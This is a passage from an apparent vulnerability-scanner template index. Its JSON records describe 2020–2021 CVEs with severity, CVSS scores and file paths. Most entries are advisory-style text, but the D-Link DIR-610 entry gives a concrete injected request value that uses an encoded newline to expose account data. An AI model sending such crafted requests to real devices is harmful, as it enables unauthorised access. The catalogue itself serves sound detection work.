8.15.1.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-36289.yaml"} +{"ID":"CVE-2020-36365","Info":{"Name":"Smartstore \u003c4.1.0 - Open Redirect","Severity":"medium","Description":"Smartstore (aka \"SmartStoreNET\") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-36365.yaml"} +{"ID":"CVE-2020-36510","Info":{"Name":"WordPress 15Zine \u003c3.3.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.\n","Classification":{"CVSSScore":"6.10"}},"file_path":"cves/2020/CVE-2020-36510.yaml"} +{"ID":"CVE-2020-4463","Info":{"Name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","Severity":"high","Description":"IBM Maximo Asset Management is vulnerable to an\nXML external entity injection (XXE) attack when processing XML data.\nA remote attacker could exploit this vulnerability to expose\nsensitive information or consume memory resources.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2020/CVE-2020-4463.yaml"} +{"ID":"CVE-2020-5191","Info":{"Name":"PHPGurukul Hospital Management System - Cross-Site Scripting","Severity":"medium","Description":"PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-5191.yaml"} +{"ID":"CVE-2020-5192","Info":{"Name":"Hospital Management System 4.0 - SQL Injection","Severity":"high","Description":"Hospital Management System 4.0 contains multiple SQL injection vulnerabilities because multiple pages and parameters do not validate user input. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-5192.yaml"} +{"ID":"CVE-2020-5284","Info":{"Name":"Next.js \u003c9.3.2 - Local File Inclusion","Severity":"medium","Description":"Next.js versions before 9.3.2 are vulnerable to local file inclusion. An attacker can craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory.","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2020/CVE-2020-5284.yaml"} +{"ID":"CVE-2020-5307","Info":{"Name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","Severity":"critical","Description":"PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-5307.yaml"} +{"ID":"CVE-2020-5405","Info":{"Name":"Spring Cloud Config - Local File Inclusion","Severity":"medium","Description":"Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2020/CVE-2020-5405.yaml"} +{"ID":"CVE-2020-5410","Info":{"Name":"Spring Cloud Config Server - Local File Inclusion","Severity":"high","Description":"Spring Cloud Config Server versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user or attacker can send a request using a specially crafted URL that can lead to a local file inclusion attack.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-5410.yaml"} +{"ID":"CVE-2020-5412","Info":{"Name":"Full-read SSRF in Spring Cloud Netflix (Hystrix Dashboard)","Severity":"medium","Description":"Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2020/CVE-2020-5412.yaml"} +{"ID":"CVE-2020-5775","Info":{"Name":"Canvas LMS Unauthenticated Blind SSRF","Severity":"medium","Description":"Server-Side Request Forgery in Canvas LMS 2020-07-29 allows a remote, unauthenticated attacker to cause the Canvas application to perform HTTP GET requests to arbitrary domains.","Classification":{"CVSSScore":"5.8"}},"file_path":"cves/2020/CVE-2020-5775.yaml"} +{"ID":"CVE-2020-5776","Info":{"Name":"MAGMI - Cross-Site Request Forgery","Severity":"high","Description":"MAGMI (Magento Mass Importer) is vulnerable to cross-site request forgery (CSRF) due to a lack of CSRF tokens. Remote code execution (via phpcli command) is also possible in the event that CSRF is leveraged against an existing admin session.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-5776.yaml"} +{"ID":"CVE-2020-5777","Info":{"Name":"Magento Mass Importer \u003c0.7.24 - Remote Auth Bypass","Severity":"critical","Description":"Magento Mass Importer (aka MAGMI) versions prior to 0.7.24 are vulnerable to a remote authentication bypass due to allowing default credentials in the event there is a database connection failure.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-5777.yaml"} +{"ID":"CVE-2020-5847","Info":{"Name":"UnRaid \u003c=6.80 - Remote Code Execution","Severity":"critical","Description":"UnRaid \u003c=6.80 allows remote unauthenticated attackers to execute arbitrary code.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-5847.yaml"} +{"ID":"CVE-2020-5902","Info":{"Name":"F5 BIG-IP TMUI - Remote Code Execution","Severity":"critical","Description":"F5 BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-5902.yaml"} +{"ID":"CVE-2020-6171","Info":{"Name":"CLink Office 2.0 - Cross-Site Scripting","Severity":"medium","Description":"CLink Office 2.0 is vulnerable to cross-site scripting in the index page of the management console and allows remote attackers to inject arbitrary web script or HTML via the lang parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-6171.yaml"} +{"ID":"CVE-2020-6207","Info":{"Name":"SAP Solution Manager 7.2 - Remote Command Execution","Severity":"critical","Description":"SAP Solution Manager (SolMan) running version 7.2 has a remote command execution vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-6207.yaml"} +{"ID":"CVE-2020-6287","Info":{"Name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","Severity":"critical","Description":"SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2020/CVE-2020-6287.yaml"} +{"ID":"CVE-2020-6308","Info":{"Name":"SAP - Unauthenticated Blind SSRF","Severity":"medium","Description":"SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-6308.yaml"} +{"ID":"CVE-2020-6637","Info":{"Name":"OpenSIS 7.3 - SQL Injection","Severity":"critical","Description":"OpenSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-6637.yaml"} +{"ID":"CVE-2020-7136","Info":{"Name":"HPE Smart Update Manager \u003c 8.5.6 - Remote Unauthorized Access","Severity":"critical","Description":"HPE Smart Update Manager (SUM) prior to version 8.5.6 could allow remote unauthorized access.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-7136.yaml"} +{"ID":"CVE-2020-7209","Info":{"Name":"LinuxKI Toolset \u003c= 6.01 - Remote Command Execution","Severity":"critical","Description":"LinuxKI v6.0-1 and earlier are vulnerable to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-7209.yaml"} +{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-7247.yaml"} +{"ID":"CVE-2020-7318","Info":{"Name":"McAfee ePolicy Orchestrator \u003c5.10.9 Update 9 - Cross-Site Scripting","Severity":"medium","Description":"McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.\nreference:\n- https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/\n- https://kc.mcafee.com/corporate/index?page=content\u0026id=SB10332\n- https://nvd.nist.gov/vuln/detail/CVE-2020-7318\n","Classification":{"CVSSScore":"4.3"}},"file_path":"cves/2020/CVE-2020-7318.yaml"} +{"ID":"CVE-2020-7796","Info":{"Name":"Zimbra Collaboration Suite \u003c 8.8.15 Patch 7 - Server-Side Request Forgery","Severity":"critical","Description":"Zimbra Collaboration Suite (ZCS) before 8.8.15 Patch 7 is susceptible to server-side request forgery when WebEx zimlet is installed and zimlet JSP is enabled.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-7796.yaml"} +{"ID":"CVE-2020-7943","Info":{"Name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","Severity":"high","Description":"Puppet Server and PuppetDB provide useful performance and debugging information via their metrics API endpoints, which may contain sensitive information when left exposed.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-7943.yaml"} +{"ID":"CVE-2020-7961","Info":{"Name":"Liferay Portal Unauthenticated \u003c 7.2.1 CE GA2 - Remote Code Execution","Severity":"critical","Description":"Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-7961.yaml"} +{"ID":"CVE-2020-7980","Info":{"Name":"Satellian Intellian Aptus Web \u003c= 1.24 - Remote Command Execution","Severity":"critical","Description":"Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-7980.yaml"} +{"ID":"CVE-2020-8115","Info":{"Name":"Revive Adserver \u003c=5.0.3 - Cross-Site Scripting","Severity":"medium","Description":"Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-8115.yaml"} +{"ID":"CVE-2020-8163","Info":{"Name":"Ruby on Rails \u003c5.0.1 - Remote Code Execution","Severity":"high","Description":"Ruby on Rails before version 5.0.1 is susceptible to remote code execution because it passes user parameters as local variables into partials.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-8163.yaml"} +{"ID":"CVE-2020-8191","Info":{"Name":"Citrix ADC/Gateway - Cross-Site Scripting","Severity":"medium","Description":"Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-8191.yaml"} +{"ID":"CVE-2020-8193","Info":{"Name":"Citrix - Local File Inclusion","Severity":"medium","Description":"Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 are vulnerable to local file inclusion because they allow unauthenticated access to certain URL endpoints.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2020/CVE-2020-8193.yaml"} +{"ID":"CVE-2020-8194","Info":{"Name":"Citrix ADC \u0026 NetScaler Gateway Reflected Code Injection","Severity":"medium","Description":"Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2020/CVE-2020-8194.yaml"} +{"ID":"CVE-2020-8209","Info":{"Name":"Citrix XenMobile Server - Local File Inclusion","Severity":"high","Description":"Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.\nreference:\n- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/\n- https://support.citrix.com/article/CTX277457\n- https://nvd.nist.gov/vuln/detail/CVE-2020-8209\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-8209.yaml"} +{"ID":"CVE-2020-8497","Info":{"Name":"Artica Pandora FMS - Arbitrary File Read","Severity":"medium","Description":"In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2020/CVE-2020-8497.yaml"} +{"ID":"CVE-2020-8512","Info":{"Name":"IceWarp WebMail Server \u003c=11.4.4.1 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp Webmail Server through 11.4.4.1 contains a cross-site scripting vulnerability in the /webmail/ color parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-8512.yaml"} +{"ID":"CVE-2020-8515","Info":{"Name":"DrayTek - Remote Code Execution","Severity":"critical","Description":"DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta, and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta, and 1.4.4_Beta devices allow remote code execution as root (without authentication) via shell metacharacters to the cgi-bin/mainfunction.cgi URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-8515.yaml"} +{"ID":"CVE-2020-8641","Info":{"Name":"Lotus Core CMS 1.0.1 - Local File Inclusion","Severity":"high","Description":"Lotus Core CMS 1.0.1 allows authenticated local file inclusion of .php files via directory traversal in the index.php page_slug parameter.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-8641.yaml"} +{"ID":"CVE-2020-8644","Info":{"Name":"playSMS \u003c1.4.3 - Remote Code Execution","Severity":"critical","Description":"PlaySMS before version 1.4.3 is susceptible to remote code execution because it double processes a server-side template.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-8644.yaml"} +{"ID":"CVE-2020-8654","Info":{"Name":"EyesOfNetwork 5.1-5.3 - SQL Injection/Remote Code Execution","Severity":"high","Description":"EyesOfNetwork 5.1 to 5.3 contains SQL injection and remote code execution vulnerabilities. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. See also CVE-2020-8655, CVE-2020-8656, CVE-2020-8657, and CVE-2020-9465.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-8654.yaml"} +{"ID":"CVE-2020-8771","Info":{"Name":"WordPress Time Capsule \u003c 1.21.16 - Authentication Bypass","Severity":"critical","Description":"WordPress Time Capsule plugin before 1.21.16 for WordPress has an authentication bypass. Any request containing IWP_JSON_PREFIX causes the client to be logged in as the first account on the list of administrator accounts.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-8771.yaml"} +{"ID":"CVE-2020-8772","Info":{"Name":"WordPress InfiniteWP \u003c1.9.4.5 - Authorization Bypass","Severity":"critical","Description":"WordPress InfiniteWP plugin before 1.9.4.5 for WordPress contains an authorization bypass vulnerability via a missing authorization check in iwp_mmb_set_request in init.php. An attacker who knows the username of an administrator can log in, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-8772.yaml"} +{"ID":"CVE-2020-8813","Info":{"Name":"Cacti v1.2.8 - Remote Code Execution","Severity":"high","Description":"Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if \"Guest Realtime Graphs\" privileges are enabled.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-8813.yaml"} +{"ID":"CVE-2020-8982","Info":{"Name":"Citrix ShareFile StorageZones \u003c=5.10.x - Arbitrary File Read","Severity":"high","Description":"Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-8982.yaml"} +{"ID":"CVE-2020-9036","Info":{"Name":"Jeedom \u003c=4.0.38 - Cross-Site Scripting","Severity":"medium","Description":"Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-9036.yaml"} +{"ID":"CVE-2020-9043","Info":{"Name":"WordPress wpCentral \u003c 1.5.1 - Improper Access Control to Privilege Escalation","Severity":"high","Description":"The wpCentral plugin before 1.5.1 for WordPress allows disclosure of the connection key for Wordpress Admin Account.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-9043.yaml"} +{"ID":"CVE-2020-9047","Info":{"Name":"exacqVision Web Service - Remote Code Execution","Severity":"high","Description":"exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2020/CVE-2020-9047.yaml"} +{"ID":"CVE-2020-9054","Info":{"Name":"Zyxel NAS Firmware 5.21- Remote Code Execution","Severity":"critical","Description":"Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-9054.yaml"} +{"ID":"CVE-2020-9315","Info":{"Name":"Oracle iPlanet Web Server 7.0.x - Authentication Bypass","Severity":"high","Description":"Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-9315.yaml"} +{"ID":"CVE-2020-9344","Info":{"Name":"Jira Subversion ALM for Enterprise \u003c8.8.2 - Cross-Site Scripting","Severity":"medium","Description":"Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-9344.yaml"} +{"ID":"CVE-2020-9376","Info":{"Name":"D-Link DIR-610 Devices - Information Disclosure","Severity":"high","Description":"D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.\nNOTE: This vulnerability only affects products that are no longer supported by the maintainer.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-9376.yaml"} +{"ID":"CVE-2020-9402","Info":{"Name":"Django SQL Injection","Severity":"high","Description":"Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2020/CVE-2020-9402.yaml"} +{"ID":"CVE-2020-9425","Info":{"Name":"rConfig \u003c3.9.4 - Sensitive Information Disclosure","Severity":"high","Description":"rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-9425.yaml"} +{"ID":"CVE-2020-9483","Info":{"Name":"SkyWalking SQLI","Severity":"high","Description":"When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2020/CVE-2020-9483.yaml"} +{"ID":"CVE-2020-9484","Info":{"Name":"Apache Tomcat Remote Command Execution","Severity":"high","Description":"When using Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if\na) an attacker is able to control the contents and name of a file on the server; and\nb) the server is configured to use the PersistenceManager with a FileStore; and\nc) the PersistenceManager is configured with sessionAttributeValueClassNameFilter=\"null\" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and\nd) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control.\nNote that all of conditions a) to d) must be true for the attack to succeed.\n","Classification":{"CVSSScore":"7"}},"file_path":"cves/2020/CVE-2020-9484.yaml"} +{"ID":"CVE-2020-9496","Info":{"Name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","Severity":"medium","Description":"Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2020/CVE-2020-9496.yaml"} +{"ID":"CVE-2020-9757","Info":{"Name":"Craft CMS \u003c 3.3.0 - Server-Side Template Injection","Severity":"critical","Description":"Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2020/CVE-2020-9757.yaml"} +{"ID":"CVE-2021-1472","Info":{"Name":"Cisco Small Business RV Series - OS Command Injection","Severity":"critical","Description":"Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-1472.yaml"} +{"ID":"CVE-2021-1497","Info":{"Name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","Severity":"critical","Description":"Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-1497.yaml"} +{"ID":"CVE-2021-1498","Info":{"Name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","Severity":"critical","Description":"Cisco HyperFlex HX contains multiple vulnerabilities in the web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-1498.yaml"} +{"ID":"CVE-2021-1499","Info":{"Name":"Cisco HyperFlex HX Data Platform - Arbitrary File Upload","Severity":"medium","Description":"Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2021/CVE-2021-1499.yaml"} +{"ID":"CVE-2021-20031","Info":{"Name":"SonicWall SonicOS 7.0 - Open Redirect","Severity":"medium","Description":"SonicWall SonicOS 7.0 contains an open redirect vulnerability. The values of the Host headers are implicitly set as trusted. An attacker can spoof a particular host header, allowing the attacker to render arbitrary links, obtain sensitive information, modify data, execute unauthorized operations. and/or possibly redirect a user to a malicious site.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2021/CVE-2021-20031.yaml"} +{"ID":"CVE-2021-20038","Info":{"Name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","Severity":"critical","Description":"A Stack-based buffer overflow vulnerability in SMA100 Apache httpd server's mod_cgi module environment variables allows a remote unauthenticated attacker to potentially execute code as a 'nobody' user in the appliance. This vulnerability affected SMA 200, 210, 400, 410 and 500v appliances firmware 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv and earlier versions.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-20038.yaml"} +{"ID":"CVE-2021-20090","Info":{"Name":"Buffalo WSR-2533DHPL2 - Path Traversal","Severity":"critical","Description":"Buffalo WSR-2533DHPL2 firmware version \u003c= 1.02 and WSR-2533DHP3 firmware version \u003c= 1.24 are susceptible to a path traversal vulnerability that could allow unauthenticated remote attackers to bypass authentication in their web interfaces.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2021/CVE-2021-20090.yaml"} +{"ID":"CVE-2021-20091","Info":{"Name":"Buffalo WSR-2533DHPL2 - Configuration File Injection","Severity":"high","Description":"The web interfaces of Buffalo WSR-2533DHPL2 firmware version \u003c= 1.02 and WSR-2533DHP3 firmware version \u003c= 1.24 does not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially leading to remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2021/CVE-2021-20091.yaml"} +{"ID":"CVE-2021-20092","Info":{"Name":"Buffalo WSR-2533DHPL2 - Improper Access Control","Severity":"high","Description":"The web interfaces of Buffalo WSR-2533DHPL2 firmware version \u003c= 1.02 and WSR-2533DHP3 firmware version \u003c= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-20092.yaml"} +{"ID":"CVE-2021-20114","Info":{"Name":"TCExam \u003c= 14.8.1 - Sensitive Information Exposure","Severity":"high","Description":"When installed following the default/recommended settings, TCExam \u003c= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2021/CVE-2021-20114.yaml"} +{"ID":"CVE-2021-20123","Info":{"Name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","Severity":"high","Description":"Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root 